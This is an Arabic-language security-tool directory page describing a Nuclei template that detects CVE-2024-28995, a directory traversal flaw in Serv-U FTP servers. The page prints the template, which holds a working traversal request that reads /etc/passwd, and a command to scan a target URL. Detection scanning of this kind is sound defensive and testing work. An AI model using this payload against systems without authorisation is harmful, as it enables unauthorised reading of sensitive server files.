Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-28995-Nuclei-Template — قالب Nuclei للكشف عن CVE-2024-28995، وهو ثغرة اجتياز الدليل في خادم Serv-U FTP، مما يتيح قراءة الملفات عبر طلبات HTTP مصممة. | Kitploit
أدوات/GitHubGitHub/huseyinstif/cve-2024-28995-nuclei-template
ماسحات الثغرات الأمنيةماسحات الثغرات الأمنية للويبتحليل الثغرات الأمنيةالاستغلالأمن الويباختبار الاختراق
GitHubhuseyinstif/cve-2024-28995-nuclei-template

CVE-2024-28995-Nuclei-Template

قالب Nuclei للكشف عن CVE-2024-28995، وهو ثغرة اجتياز الدليل في خادم Serv-U FTP، مما يتيح قراءة الملفات عبر طلبات HTTP مصممة.

عرض المستودع
14منذ 2 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

قالب Nuclei لـ CVE-2024-28995

يتحقق من ثغرة اجتياز الدليل في إصدارات Serv-U 15.4.2 وما دون، والتي تسمح بقراءة الملفات الحساسة مثل /etc/passwd.

تفاصيل القالب

root@kitploit:~
id: CVE-2024-28995

info:
  name: Serv-U Directory Traversal Vulnerability
  author: Hüseyin TINTAŞ
  severity: high
  description: Checks for directory traversal vulnerability in Serv-U versions 15.4.2 and below, which allows reading sensitive files like /etc/passwd.
  reference:
    - https://attackerkb.com/topics/2k7UrkHyl3/cve-2024-28995/rapid7-analysis
  tags: pathtraversal,cve,high,serv-u

requests:
  - method: GET
    path:
      - "{{BaseURL}}/?InternalDir=\\..\\..\\..\\..\\etc^&InternalFile=passwd"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "root:x:"
          - "daemon:x:"
          - "bin:x:"
        part: body

      - type: status
        status:
          - 200

      - type: word
        words:
          - "Server: Serv-U"
        part: header



الاستخدام

لاستخدام هذا القالب مع Nuclei، احفظ محتوى القالب في ملف باسم وقم بتشغيل الأمر التالي:

CVE-2024-28995.yaml
root@kitploit:~
nuclei -t CVE-2024-28995.yaml -u <target-url>

استبدل <target-url> بعنوان URL للهدف الذي تريد مسحه.

الاتصال

للاستفسارات أو المعلومات الإضافية، يمكنك التواصل معي عبر:

  • LinkedIn
  • Twitter
تنزيل الأداة